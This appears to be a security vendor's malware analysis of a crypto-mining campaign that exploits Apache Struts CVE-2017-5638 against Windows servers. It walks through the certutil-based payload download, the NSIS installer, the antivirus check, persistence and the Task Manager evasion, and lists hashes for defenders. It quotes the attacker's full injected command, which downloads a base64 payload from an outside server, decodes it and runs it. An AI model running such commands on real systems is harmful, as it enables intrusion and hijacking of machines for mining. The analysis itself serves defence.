- The long-running Apache Struts 2 Jakarta Multipart Parser remote code execution (RCE) (CVE-2017-5638) crypto-mining campaign is now targeting Windows, not just Linux systems.
- The campaign is mining Electroneum coin (ETN),
- The Windows built-in tool certutil is used to download the malware in base64 encoded format.
- The malware specifically detects the ESET antivirus software.
- Like some other crypto-miners, it hides by terminating itself when Windows Task Manager is opened to check running processes or machine performance.
- Malware hosting servers are based in Las Vegas, Nevada.
Since July of 2017, F5 researchers have been monitoring a campaign exploiting the Apache Struts 2 Jakarta Multipart Parser remote code execution (RCE) vulnerability (CVE-2017-5638). This campaign began by infecting Struts systems running on the Linux operating system to mine Electroneum crypto-currency. It’s often the case that, as the time passed, the attackers decide to expand their mining operations to new targets.
New Target: Windows Systems
In Figure 1, an example of the original attack request shows that the attackers were initially injecting Linux shell payload that was using the built-in Linux “wget” and “curl” tools to download the miner malware and add it as a “cron” job for persistence.
Figure 1: Original attack request targeting Linux servers
In mid-March, 2018, F5 researchers observed a shift in the existing campaign wherein the injected payload changed to target Windows-based Struts servers.
Figure 2: Latest attack request targeting Windows servers
As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file.
Using the Windows certutil Tool
While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to download and upload jobs. We have already have witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:
certutil -urlcache -split -f http://126.96.36.199/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe
The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.
“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”
However, a lesser known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using base64 encoding certificate format, as shown in Figure 3.
Figure 3: Content of update.b64 file before decoding
Once the file is downloaded and base64-decoded using certutil, it is saved as update.exe and executed.
As shown in Figure 4, the metadata for the file indicates that the executable file most likely was created on January 30, 2018.
Figure 4: Downloaded executable file metadata
Installing Malware Like a Boss
The file itself is a Windows installer that was created using a legitimate NSIS (Nullsoft Scriptable Install System) tool.
“NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers. It is designed to be as small and flexible as possible and is therefore very suitable for internet distribution.”
While most malwares implement their own downloader to evade detection, the current attacker is not even trying to hide and is using a more obvious way to install it, which requires just scripting knowledge.
Figure 5: The update.exe file content indicating it was created using the NSIS software
The installer script language is compatible with all major versions of Windows and provides an easy API to interact with different components of the operating system using simple syntax.
The installer contains three DLL files that are part of the NSIS system and enable it to execute certain commands.
Figure 6: The content of the installer archive file
Issues with ESET Antivirus?
Once the installer is executed, it sleeps for 16 seconds and checks for the presence of ESET antivirus on the vulnerable machine. There is no obvious explanation why the attacker chooses to check specifically for ESET antivirus.
If the ESET antivirus presents, the installer will use nsisdl.dll to download a file called nod.lock and stop the installation process. Unfortunately, we were not able to get the file during the analysis of this campaign. Strangely, this file is not being executed or mentioned further in the code.
Figure 7: Search for “c:\Program Files\ESET” directory and download of “nod.lock”
Running the Malware
If ESET antivirus is not present on the vulnerable machine, the installer checks the operation system architecture using system.dll plug-in and downloads “msi32.zip” or “msi64.zip” accordingly.
Figure 8: Download of msi32.zip or msi64.zip
The file is downloaded to the %appdata%/MSSearchIndexer folder and unzipped using the ZipDLL.dll module, which contains only a few files. The extracted zip file is then removed from the target system.
Figure 9: Contents of the “msi32/64.zip” file
The installer then executes the malicious SerachIndexer.exe file, which in turn starts the mssearch.exe file. The reason behind this execution concatenation will be soon explained.
Figure 10: Unzipping and executing “SearchIndexer.exe”
For persistence, the installer adds a registry entry to run this file on startup.
Figure 11: The added registry entry
The extracted mssearch.exe file is a fork of cpuminer project called CPUMiner-Multi. The main difference between the two miners is that the CPUMiner multi-supports more algorithms than the original one. In this case, the miner is configured to mine Electroneum (ETN) cryptocurrency.
Figure 12: “Mssearch.exe” output while executed without arguments
Looking at the search.cf miner configuration file, we can see the mining pool address with the wallet public address.
Figure 13: The content of the miner configuration file
The pool server itself is located in Germany, as shown in Figure 14.
Figure 14: Pool server location
To date, the Windows operation seems not to be extremely profitable as the mined amount for a few days is only about $20.00. Not quite the large payouts we’ve seen from other cryptomining campaigns.
Figure 15: Mining pool and attacker’s wallet information
Hiding from Tasks Manager
As mentioned before, the MSSearchIndexer.exe executable file is starting the mssearch.exe miner, while it is also responsible for hiding the mining operation.
Figure 16: Execution of “mssearch.exe” process
Because an infected user might try to check why their machine is so slow by opening the Windows Task Manager to view the CPU and memory performance, the process contantly checks to see whether Windows Task Manager is being opened on the target system. If it is, the mssearch.exe process will be killed or won’t start if it is already open. This can be seen in figures 17 – 20.
Figure 17: Searching for “taskmgr” in process list
Figure 18: Termination command
Figure 19: “mssearch.exe” process terminated
Once the task manager is closed, MssearchIndexer.exe will start the mining process again.
Figure 20: Restarting the “mssearch.exe” process
Indicators of Compromise
- update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56
- update.exe: 5bb5d3cb837d97174eddc681ca98aa80
- msi64.zip: 8d8b8abe93aea52f9865f045a49912ae
- SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d
- mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f2
Figure 21: 188.8.131.52 server information
Figure 22: 184.108.40.206 server information
Figure 23: 220.127.116.11 server information
Figure 24: 18.104.22.168 server information
Crypto-mining campaigns are very popular nowadays, and the Monero (XMR) currency is the common choice for cybercrime. This campaign is an interesting example of attackers shifting operations to mine another currency. Both Monero and Electroneum use the CryptoNight algorithm, which is just as suitable to mine on a CPU as it is on a GPU. This explains why the attackers chose to mine on compromised web servers. Because Electroneum and Monero are not the only cryptocurrency that provide this behavior, we can expect to see attackers extend their campaigns to other cryptocurrencies, as well, in the future.
To prevent this attack on your applications, simply patch the Apache Struts 2 Jakarta Multipart Parser remote code execution CVE-2017-5638 and (or) implement a web application firewall to block the attack.